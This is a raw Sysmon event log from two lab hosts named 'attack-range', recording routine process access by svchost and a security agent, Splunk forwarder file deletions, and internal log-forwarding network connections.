10341000x800000000000000044645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:42.928{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:42.928{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:42.211{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E9636A361D95B2B095B06172BEA1A4,SHA256=883357FD14515E1DDA5FC64E975EB7C81AAB9E99A35901E36F34E4FB118BD83B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017274Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:43.754{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=666718C7A13C67E4CCDB3A0288AAB5D5,SHA256=20704DBBEBA653AAB375177C37FABF049609F9E713C4A53B3F2FEA93C6D1BBFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:43.264{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF89F91F472A6010125E77B9C37F83D4,SHA256=7660D243AF98E8E6357868E1FC94FAC0AD362EA355B9BB45511F7B1DECAB5B78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017276Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:44.861{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27AFF5E653FC874E92F2E0107F8B255,SHA256=163F8694F02CABAE99378D1E5894F8FA64199BA843A1F5F9835E3CE4C81F1283,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:42.539{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56396-false10.0.1.12-8000- 23542300x800000000000000044648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:44.315{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888905A622B380CA182C3EAD9701036B,SHA256=6A0CB6A29F0130DCE428BB73ED95EFD82C1F6EBDD90AE8729BCEAD04D8748237,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017275Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:43.090{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50128-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017277Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:45.944{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=184BAFE0A4AA6BDDC003A264954C61EB,SHA256=5E1C2BE2ACA845A2EBE0C1FE67F485CDF694F820DC92B721FEACD869687FF377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:45.386{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F8673E7977754919D23D437B2FB66A5,SHA256=D43A529D1E9529F06DF86193EC628D815EDB345D1C36BBABC09560CF2D167332,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:45.368{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=814B8F135146617F2BA9512DC9C75557,SHA256=957F749280B57A5E2DE3508C64594C0BC89E64B73614628875DC14AA72B7F053,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:46.436{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AF9DA12ED7015CAEF2D473A56EFB06F,SHA256=C18B03BFF4AAF76883C59665E25AC978231D5C8DFACA5E1D78D661C34FF49693,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:47.573{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B598BE0608A2D3E7160697D3082A042,SHA256=EB43C64F682F146D41AA5B250C69821E8C27711FEC94507F458318D8589C1CE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017278Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:47.039{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCAE0C4F239CA6147D610F01CEFBC1DB,SHA256=94CEEF0EF5436C6295E1FAB5742E8F3E2B3367A0F2EBB345B0C5662050CA1AC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:48.640{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD5D26F32EDE8ABDAA716D1D475A3D0B,SHA256=6529D528E61E0AF64A4E0A2588A5D71DFF96273F6BED311794941AE3CB09FE49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017279Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:48.108{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCCE8D9EC86012312C2DB549AE39180D,SHA256=9397EF502CE2BEDCD32783A25ADC8EB224CA85F6F7D652691DC8CD8FA98EA5A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:49.695{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=575169B62A8E01B738A8A65E33EDA699,SHA256=A93F8FB67CF36D3DCC2A6EC0CABFAE24079458339DE6895A74F8586C211E762F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017280Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:49.198{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D546ECAD215AA99D8276B97DB555BE2,SHA256=5AC180411DB4E64F39CD9C303B75381E7DF0A858E358F97E5D36BBBDED538901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:50.749{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-045MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:50.731{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E57F6D1F0B6D2B4DECEB24DAF3AC204B,SHA256=D7A88F5F61E187629D4D998A97E8556C5EBBCEBD3AEC9A613FB266BBDFB56BFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017282Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:49.091{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50129-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017281Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:50.283{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=838EDB37949B8EA9AC033CEA2B5E04CA,SHA256=EB218D6F39DAF31640364E9FA0AF587D7F0AA32D27CF0D2A8D32650509592A8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:47.549{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56397-false10.0.1.12-8000- 10341000x800000000000000044684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.903{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.867{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.835{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.814{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 